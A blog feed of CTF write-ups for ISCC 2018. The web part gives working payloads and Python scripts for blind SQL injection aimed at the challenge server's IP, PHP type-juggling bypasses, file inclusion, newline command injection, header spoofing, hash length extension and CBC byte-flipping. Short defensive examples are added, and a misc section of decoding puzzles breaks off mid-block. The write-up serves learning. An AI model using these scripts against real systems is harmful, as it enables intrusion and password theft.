<p>F12, change maxlength to 4</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_1.png" alt="" /></p>
<h3>web01</h3>
<p><img src="/wp-content/uploads/2018/05/052518_1206_2.png" alt="" /></p>
<p>strcmp() returns NULL when it is given an array, and PHP is weakly typed: in an == comparison against a number the other side is first converted to a number, and NULL converts to 0, so the check passes.</p>
<p>payload: GET <code>/?password[]=1</code></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_3.png" alt="" /></p>
<h3>Local temptation (本地的诱惑)</h3>
<p>Right-click, view the page source, and the flag is there.</p>
<h3>Can you cross over? (你能跨过去吗？)</h3>
<p><img src="/wp-content/uploads/2018/05/052518_1206_4.png" alt="" /></p>
<p>Copy the callback parameter and base64-decode it: <code>&lt;script&gt;alert("key:/%nsfocusXSStest%/")&lt;/script&gt;</code>. Submit the key to get the flag.</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_5.png" alt="" /></p>
<h3>It's all routine (一切都是套路)</h3>
<p>Request /index.php.txt to get the source:</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_6.png" alt="" /></p>
<p>Variable overwrite through <code>$$</code>:</p>
<p>GET: <code>?_200=flag</code></p>
<p>POST: <code>flag=x</code></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_7.png" alt="" /></p>
<h3>Can you get around it? (你能绕过吗)</h3>
<p><img src="/wp-content/uploads/2018/05/052518_1206_8.png" alt="" /></p>
<p>Changing the f parameter produces an error, which suggests a file inclusion vulnerability.</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_9.png" alt="" /></p>
<p>Read the flag through a PHP stream wrapper. Testing shows that <code>php</code> is filtered, but wrapper names are case-insensitive, so <code>PHP://filter/convert.base64-encode/resource=index</code> works; base64-decode the output to read the flag.</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_10.png" alt="" /></p>
<h3>web02</h3>
<p><img src="/wp-content/uploads/2018/05/052518_1206_11.png" alt="" /></p>
<p>Intercept the request in Burp and add a <code>Client-IP: 127.0.0.1</code> header to spoof the client address; the server trusts it and returns the flag.</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_12.png" alt="" /></p>
<h3>Please ping my IP, can you reach it? (请ping我的ip 看你能Ping通吗？)</h3>
<p>The task says ping, so guess command injection. <code>;</code>, <code>&amp;</code>, <code>|</code> and similar separators are filtered; a newline (<code>%0a</code>) is not, and the shell treats it as a command separator as well.</p>
<p>List the root directory with <code>ls /</code></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_13.png" alt="" /></p>
<p>The flag turns up under /home. payload: <code>/?ip=127.0.0.1%0a cat /home/flag</code></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_14.png" alt="" /></p>
<h3>Please give me username and password!</h3>
<p>/index.php.txt leaks the source; bypass it with PHP's loose comparison:</p>
<p><code>?username[]=0&amp;password=1e9</code></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_15.png" alt="" /></p>
<h3>The art of SQL injection (SQL注入的艺术)</h3>
<p><a href="/wp-content/uploads/2018/05/052518_1206_16.png"><img loading="lazy" class="alignnone size-full wp-image-303" src="/wp-content/uploads/2018/05/052518_1206_16.png" alt="" width="1504" height="827" /></a></p>
<p>Open the profile page: wide-byte injection, which works both blind and with UNION. I wrote a blind-injection script at the time:</p>
<pre class="lang:default decode:true ">import requests

cname = ''
flag = ''
# %df followed by the escaped quote forms one multi-byte GBK character, so the
# backslash is swallowed and the quote breaks out (wide-byte injection);
# %23 is '#', which comments out the rest of the query.
url = 'http://118.190.152.202:8015/index.php?id=1%df'
payload = "' and ascii(substr(({p}),{m},1))={n}%23"
# candidate byte values: digits, letters, and the punctuation that shows up in
# column names and flags
charset = [64,94,96,124,176,40,41,48,49,50,51,52,53,54,55,56,57,173,175,95,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,44]
# 0x61646d696e73 is 'admins' in hex, which avoids quoting inside the subquery
for i in range(1, 46):
    for ss in charset:
        p = payload.format(p='select group_concat(column_name) from information_schema.columns where table_name = 0x61646d696e73', m=i, n=ss)
        u = requests.get(url + p)
        if "head.jpg" in u.text:      # the profile image only appears when the condition is true
            cname += chr(ss)
            print(cname)
            break
for i in range(1, 23):
    for l in charset:
        pp = payload.format(p='select flag from admins', m=i, n=l)
        u = requests.get(url + pp)
        if "head.jpg" in u.text:
            flag += chr(l)
            print(flag)
            break</pre>
<p><img src="/wp-content/uploads/2018/05/052518_1206_17.png" alt="" /></p>
<h3>Give it a try (试试看)</h3>
<p>/show.php?img=1.jpg (copy the image address): file inclusion.</p>
<p>A value that does not contain .jpg returns "File not found!"; resource can name two files, which gets around that.</p>
<p>payload: <code>php://filter/convert.base64-encode/resource=../flag.php|1.jpg</code>, then view the page source to get the flag.</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_18.png" alt="" /></p>
<h3>Collide</h3>
<p><img src="/wp-content/uploads/2018/05/052518_1206_19.png" alt="" /></p>
<p>The source is given. The key is unknown, but its length is known to be 46, so a hash length extension attack applies.</p>
<p>Encoded username: <code>guest%80%00%00%00%00%98%01%00%00%00%00%00%00admin</code></p>
<p>MD5 computed with hashdump: <code>5f585093a7fe86971766c3d25c43d0eb</code></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_20.png" alt="" /></p>
<h3>Only admin can see flag</h3>
<p>CBC byte-flipping attack</p>
<p>/index.txt shows the source; a quick search pointed to the CBC byte-flipping attack. Script:</p>
<pre class="lang:default decode:true ">import base64
from urllib.parse import quote, unquote

# the serialised session, one 16-byte AES block per line:
#a:2:{s:8:"userna
#me";s:5:"admiN";
#s:8:"password";s
#:6:"123456";}
cipher = base64.b64decode(unquote("uA900LR7DpuWKx7K5GyvwtBhhc4Q9OVGMoXMYfIxo4lw8qgJmlbjELEU%2FeOWSGR31Zyi8BkxJ4knpng7j4sMUQ%3D%3D"))
iv = base64.b64decode(unquote("9qcxkpyvwymnvOp49F2Uvg%3D%3D"))
# Step 1: plaintext block 1 = D(cipher block 1) xor cipher block 0, so flipping
# byte 13 of block 0 turns the 'N' of "admiN" into 'n'; block 0 itself becomes garbage.
newcipher = cipher[0:13] + bytes([cipher[13] ^ ord('N') ^ ord('n')]) + cipher[14:]
print(quote(base64.b64encode(newcipher)))
# Step 2: the server's unserialize() error leaks the garbled plaintext; paste
# that base64 value here (this is the value from my run).
jiamingwen = base64.b64decode(unquote('twZ92UO5Kx1ne5hEeGTCum1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjY6IjEyMzQ1NiI7fQ=='))
mingwen = b'a:2:{s:8:"userna'
# Step 3: block 0 = D(cipher block 0) xor iv, so iv' = iv xor garbled xor wanted
# makes block 0 decrypt to the original text again.
newiv = bytes(mingwen[i] ^ jiamingwen[i] ^ iv[i] for i in range(16))
print(quote(base64.b64encode(newiv)))</pre>
<p>First log in as admiN / 123456</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_21.png" alt="" /></p>
<p>Press Enter in the address bar (do not refresh, or cipher and iv are regenerated) and capture the request with Burp.</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_22.png" alt="" /></p>
<p>Put iv and cipher into the script to get the new cipher, replace the cipher cookie with it, and take the cipher from the error message.</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_23.png" alt="" /></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_24.png" alt="" /></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_25.png" alt="" /></p>
<p>Copy the cipher from the error message into the script and run it to get the new iv; set the iv cookie to the new iv and the cipher cookie to the value from the first run. That yields the flag.</p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_26.png" alt="" /></p>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 18pt;"> 为什么这么简单啊</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_27.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">根据提示利用 xff ip地址伪造和referer 即可进入第二关。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_28.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_29.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 右键查看源码，发现可疑js文件，浏览找到密码 base64解码 提交得到flag。<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> <img src="/wp-content/uploads/2018/05/052518_1206_30.png" alt="" /><br />
</span></p>
<pre><code><span style="color: black; font-size: 7pt;"><span style="font-family: Courier New;">ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAHAAYQBzAHMAdwBvAHIAZAA6AHgAaQBuAHkAaQBqAGkALgBjAG8AbQAiACkAPAAvAHMAYwByAGkAcAB0AD4
</span><span style="font-family: 宋体;">解码得到</span><span style="font-family: Courier New;">: xinyiji.com
</span></span></code></pre>
<p><img src="/wp-content/uploads/2018/05/052518_1206_31.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">PHP is the best language in the world</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_32.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Enter any username; bypass the password check with PHP weak typing: QNKCDZO (<a href="/ctf/222/">see the PHP notes I wrote earlier</a>)</span></p>
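<p>As an added example (not from the original writeup), a Python model of why the QNKCDZO trick works and what the fix looks like: PHP's <code>==</code> compares two numeric-looking strings as numbers (still the case in PHP 8), and md5("QNKCDZO") is "0e" followed only by digits, so it equals any other "0e…" digest. The stored credential below is assumed, and <code>hmac.compare_digest</code> stands in for PHP's <code>hash_equals</code>.</p>

```python
import hashlib
import hmac
import re

# PHP's numeric-string grammar: optional sign, digits, fraction, exponent
PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

def php_loose_eq(a, b):
    """Model of PHP's == on two strings: numeric-looking strings are compared as numbers,
    so '0e830...' == '0e462...' holds because both parse as 0 x 10^N == 0.0."""
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def is_magic_hash(hexdigest):
    """'0e' followed only by digits: PHP reads the whole digest as the number zero."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None

def login_loose(stored_hash, password):
    """The vulnerable pattern: if (md5($password) == $stored_hash)"""
    return php_loose_eq(md5_hex(password), stored_hash)

def login_strict(stored_hash, password):
    """Hardened: hash_equals(md5($password), $stored_hash), strict and constant-time."""
    return hmac.compare_digest(md5_hex(password), stored_hash)

if __name__ == "__main__":
    stored = md5_hex("240610708")  # another well-known magic-hash preimage, assumed as the stored credential
    print(md5_hex("QNKCDZO"), is_magic_hash(md5_hex("QNKCDZO")))
    print(login_loose(stored, "QNKCDZO"), login_strict(stored, "QNKCDZO"))
```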
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Click to get <img src="/wp-content/uploads/2018/05/052518_1206_33.png" alt="" /></span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_34.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Use the global variables to print out the $flag variable.</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_35.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Sqli<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">The challenge title says it outright: injection. Testing showed it is blind injection, so I wrote a script to brute-force the password and log in.</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_36.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_37.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Decrypted: u4g009</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_38.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">The hint is in another field (what a nasty trap); a plain UNION query injection does the job here.</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_39.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">For the record, here is the crude blind-injection script I wrote</span></p>
<pre class="lang:default decode:true ">import requests

url = 'http://118.190.152.202:8011/index.php'
# Boolean-based blind probe: the response contains 'normal' only when the condition holds
payload = "admin' and ascii(substr(({s}),{m},1))={n}#"
fuzz = '0123456789,abcdefghijklmnopqrstuvwxyz'
tname = ''
pwd = ''

# First pass (left commented out after use): enumerate table names in the current schema
# for i in range(1, 10):
#     for k in fuzz:
#         p = payload.format(s='select group_concat(table_name) from information_schema.tables where table_schema = database()', m=i, n=ord(k))
#         u = requests.post(url, data={'username': p, 'password': 'admin'})
#         if 'normal' in u.text:
#             tname += k
#             print(tname)
#             break

# Second pass: recover the password from the user table one character at a time
for i in range(1, 33):
    for k in fuzz:
        p = payload.format(s="select group_concat(pass) from user", m=i, n=ord(k))
        u = requests.post(url, data={'username': p, 'password': 'admin'})
        if 'normal' in u.text:
            pwd += k
            print(pwd)
            break</pre>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Bypass it if you dare</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> <img src="/wp-content/uploads/2018/05/052518_1206_40.png" alt="" /><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">The hint says the database is MySQL; exploit a MySQL feature, implicit type conversion, with blind injection to get the password.</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_41.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">I wrote a script to brute-force the password and log in.</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_42.png" alt="" /></p>
<pre class="lang:default decode:true ">import requests

url = "http://118.190.152.202:8019/login.php"
# MySQL converts '1' and '' to numbers, so uname = '1'-(cond)-'' becomes uname = 1-(cond)-0:
# when the guess is right the value is 0, which matches every non-numeric username,
# and the login form (the word 'username') disappears from the response
payload = "1'-(ascii(mid((passwd)from({0})))={1})-'"
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789'
password = ''

for i in range(1, 33):
    for k in fuzz:
        p = payload.format(i, ord(k))
        u = requests.post(url, data={'uname': p, 'passwd': 'admin'})
        if 'username' not in u.text:
            password += k
            print(password)
            break</pre>
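<p>From the defender's side, an added example that is not part of the original writeup: given request logs, it recognises the two probe shapes the scripts above send and reconstructs, per character position, the guess whose response size differed from the others. The log lines and their response sizes are constructed to mirror the payloads on this page.</p>

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# The two probe shapes used by the scripts above (case-insensitive):
#   ascii(substr((<query>),<pos>,1))=<val>   and   ascii(mid((<col>)from(<pos>)))=<val>
PROBES = [
    re.compile(r"ascii\(substr\(.*?,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I | re.S),
    re.compile(r"ascii\(mid\(.*?from\s*\(?(\d+)\)?\s*\)\s*\)\s*=\s*(\d+)", re.I | re.S),
]

def parse_probe(body):
    """Return (position, byte value) when a form body carries one of the probes, else None."""
    body = unquote_plus(body)
    for rx in PROBES:
        m = rx.search(body)
        if m:
            return int(m.group(1)), int(m.group(2))
    return None

def reconstruct(log_lines):
    """Rebuild the characters the probes confirmed from tab-separated '<form body>' and
    '<response bytes>' lines (a constructed format). Per position, the single response
    size that deviates from the majority marks the TRUE branch, i.e. the matching guess."""
    by_pos = defaultdict(list)
    for line in log_lines:
        body, size = line.rsplit("\t", 1)
        probe = parse_probe(body)
        if probe:
            by_pos[probe[0]].append((probe[1], int(size)))
    recovered = {}
    for pos, hits in by_pos.items():
        common = Counter(size for _, size in hits).most_common(1)[0][0]
        outliers = [val for val, size in hits if size != common]
        if len(outliers) == 1:
            recovered[pos] = chr(outliers[0])
    return "".join(recovered[p] for p in sorted(recovered))

# Constructed log lines: three guesses per position, only one of which changed the page size
SAMPLE_LOG = [
    "username=admin%27+and+ascii(substr((select+group_concat(pass)+from+user),1,1))=116%23&password=admin\t1530",
    "username=admin%27+and+ascii(substr((select+group_concat(pass)+from+user),1,1))=117%23&password=admin\t1612",
    "username=admin%27+and+ascii(substr((select+group_concat(pass)+from+user),1,1))=118%23&password=admin\t1530",
    "username=admin%27+and+ascii(substr((select+group_concat(pass)+from+user),2,1))=51%23&password=admin\t1530",
    "username=admin%27+and+ascii(substr((select+group_concat(pass)+from+user),2,1))=52%23&password=admin\t1612",
    "username=admin%27+and+ascii(substr((select+group_concat(pass)+from+user),2,1))=53%23&password=admin\t1530",
]

if __name__ == "__main__":
    print(reconstruct(SAMPLE_LOG))  # "u4"
```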
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Decrypted: nishishabi1438 (I really want to strangle the idiot who set this challenge)</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_43.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Enter flag and execute it.</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_44.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">web400 Only Admin is a cookie injection, but I did not really look at it; I'll wait for other masters to share their writeups and learn from those.</span></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
<title>ISCC 2018 Misc WriteUp</title>
		<link>/ctf/422.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 25 May 2018 11:50:45 +0000</pubDate>
<category><![CDATA[CTF Notes]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[iscc2018]]></category>
		<category><![CDATA[msic]]></category>
		<category><![CDATA[Writeup]]></category>
		<guid isPermaLink="false">/?p=266</guid>

<description><![CDATA[X1r0z: you were all out flirting with girls on 520 while I was doing challenges. What is that? PNG format; the flag should be under the finger. Drag it into TweakPNG: CRC error, so the image width or...]]></description>
<content:encoded><![CDATA[<p>X1r0z: you were all out flirting with girls on 520 while I was doing challenges</p>
<h2 id="what-is-that">What is that?</h2>
<p><a href="/wp-content/uploads/2018/05/1527078386.jpg"><img loading="lazy" class="alignnone size-full wp-image-267" src="/wp-content/uploads/2018/05/1527078386.jpg" alt="" width="600" height="491" /></a></p>
<p>PNG format; the flag is probably under the finger</p>
<p>Drag it into TweakPNG</p>
<p><a href="/wp-content/uploads/2018/05/1527078387.jpg"><img loading="lazy" class="alignnone size-full wp-image-268" src="/wp-content/uploads/2018/05/1527078387.jpg" alt="" width="438" height="169" /></a></p>
<p>CRC error: the image width or height was probably changed</p>
<p>Fix it in WinHex</p>
<p><a href="/wp-content/uploads/2018/05/1527078388.jpg"><img loading="lazy" class="alignnone size-full wp-image-269" src="/wp-content/uploads/2018/05/1527078388.jpg" alt="" width="378" height="58" /></a></p>
<p>View the result</p>
<p><a href="/wp-content/uploads/2018/05/1527078390.jpg"><img loading="lazy" class="alignnone size-full wp-image-270" src="/wp-content/uploads/2018/05/1527078390.jpg" alt="" width="532" height="77" /></a></p>
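<p>The CRC complaint from TweakPNG and the hand edit in WinHex, as an added Python example (not from the original writeup): it recomputes the IHDR CRC the way a viewer does and, when it fails, searches for the height or width under which the stored CRC becomes valid again. The PNG header it works on is built inline as a fixture rather than taken from the challenge file.</p>

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def build_png_header(width, height):
    """Signature + IHDR chunk (8-bit RGB) with a correct CRC; a constructed fixture, not a real file."""
    data = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + data)
    return PNG_SIG + struct.pack(">I", len(data)) + b"IHDR" + data + struct.pack(">I", crc)

def tamper_height(png, new_height):
    """Rewrite the height field without touching the CRC (what the challenge author did)."""
    return png[:20] + struct.pack(">I", new_height) + png[24:]

def read_ihdr(png):
    """Return (width, height, crc_ok): the check that makes TweakPNG complain."""
    if png[:8] != PNG_SIG or png[12:16] != b"IHDR":
        raise ValueError("not a PNG, or IHDR is not the first chunk")
    length = struct.unpack(">I", png[8:12])[0]
    data = png[16:16 + length]
    stored = struct.unpack(">I", png[16 + length:20 + length])[0]
    width, height = struct.unpack(">II", data[:8])
    return width, height, zlib.crc32(b"IHDR" + data) == stored

def recover_dimensions(png, max_dim=10000):
    """On a CRC mismatch, find the height (then the width) under which the stored CRC is
    correct again: the CRC covers type + data, so a field edited without a CRC update is provable."""
    width, height, ok = read_ihdr(png)
    if ok:
        return width, height
    length = struct.unpack(">I", png[8:12])[0]
    data = bytearray(png[16:16 + length])
    stored = struct.unpack(">I", png[16 + length:20 + length])[0]
    for h in range(1, max_dim + 1):          # puzzles usually shrink the height to hide rows
        data[4:8] = struct.pack(">I", h)
        if zlib.crc32(b"IHDR" + data) == stored:
            return width, h
    data[4:8] = struct.pack(">I", height)
    for w in range(1, max_dim + 1):
        data[0:4] = struct.pack(">I", w)
        if zlib.crc32(b"IHDR" + data) == stored:
            return w, height
    return None

if __name__ == "__main__":
    tampered = tamper_height(build_png_header(640, 480), 100)   # height cut, CRC left alone
    print(read_ihdr(tampered), recover_dimensions(tampered))    # (640, 100, False) (640, 480)
```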
<h2 id="数字密文">Numeric Ciphertext</h2>
<p><code class="highlighter-rouge">69742773206561737921</code></p>
<p>Hex encoded; just decode it</p>
<p><code class="highlighter-rouge">it's easy!</code></p>
<h2 id="秘密电报">Secret Telegram</h2>
<p><code class="highlighter-rouge">ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA</code></p>
<p>Bacon cipher</p>
<p><code class="highlighter-rouge">ilikeiscc</code></p>
<p>Note: submit it in uppercase</p>
<h2 id="重重谍影">Layers of Espionage</h2>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>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
</code></pre>
</div>
</div>
<p>Keep base64-decoding</p>
<p>Watch out for URL encoding</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4
B5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1z
iN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc=
</code></pre>
</div>
</div>
<p>AES with an empty key</p>
<p><code class="highlighter-rouge">缽娑遠呐者若奢顛悉呐集梵提梵蒙夢怯倒耶哆般究有栗</code></p>
<p><a href="http://www.keyfc.net/bbs/tools/tudoucode.aspx" target="_blank" rel="noopener">tudoucode</a></p>
<p>Decrypt</p>
<p><code class="highlighter-rouge">把我复制走</code></p>
<h2 id="有趣的-iscc">Fun ISCC</h2>
<p><a href="/wp-content/uploads/2018/05/1527078391.jpg"><img loading="lazy" class="alignnone size-full wp-image-271" src="/wp-content/uploads/2018/05/1527078391.jpg" alt="" width="648" height="657" /></a></p>
<p>At the end of the file in WinHex</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#54;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#99;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#49;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#55;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#98;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#57;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#51;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#51;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#51;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#50;&amp;#48;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#57;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#51;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#50;&amp;#48;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#54;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#53;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#101;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#100;
</code></pre>
</div>
</div>
<p>Unicode-decode it</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>\u0066\u006c\u0061\u0067\u007b\u0069\u0073\u0063\u0063\u0020\u0069\u0073\u0020\u0066\u0075\u006e\u007d
</code></pre>
</div>
</div>
<p>Decode once more</p>
<p><code class="highlighter-rouge">flag{iscc is fun}</code></p>
<h2 id="where-is-the-flag">Where is the FLAG?</h2>
<p><a href="/wp-content/uploads/2018/05/1527078393.jpg"><img loading="lazy" class="alignnone size-full wp-image-272" src="/wp-content/uploads/2018/05/1527078393.jpg" alt="" width="267" height="264" /></a></p>
<p>Drag it into TweakPNG and see Adobe Photoshop</p>
<p>Open it and stitch the layers together</p>
<p><a href="/wp-content/uploads/2018/05/1527078394.jpg"><img loading="lazy" class="alignnone size-full wp-image-273" src="/wp-content/uploads/2018/05/1527078394.jpg" alt="" width="390" height="391" /></a></p>
<p>Scan it to get the flag</p>
<h2 id="凯撒十三世">Caesar XIII</h2>
<p><code class="highlighter-rouge">ebdgc697g95w3</code></p>
<p>Shift by 13</p>
<p><code class="highlighter-rouge">roqtp697t95j3</code></p>
<p>Submitting it failed; on reflection, the flag should start with something like flag{}</p>
<p><code class="highlighter-rouge">r -&gt; f o -&gt; l q -&gt; a t -&gt; g</code></p>
<p>And so on</p>
<p><code class="highlighter-rouge">flag:yougotme</code></p>
<h2 id="一只猫的心思">A Cat's Mind</h2>
<p><a href="/wp-content/uploads/2018/05/1527078395.jpg"><img loading="lazy" class="alignnone size-full wp-image-274" src="/wp-content/uploads/2018/05/1527078395.jpg" alt="" width="726" height="687" /></a></p>
<p>foremost carves out a doc file</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通
</code></pre>
</div>
</div>
<p>Decrypt it with the website used earlier</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code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
</code></pre>
</div>
</div>
<p>hex</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>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
</code></pre>
</div>
</div>
<p>base64</p>
<div class="highlighter-rouge">
<div class="highlight">
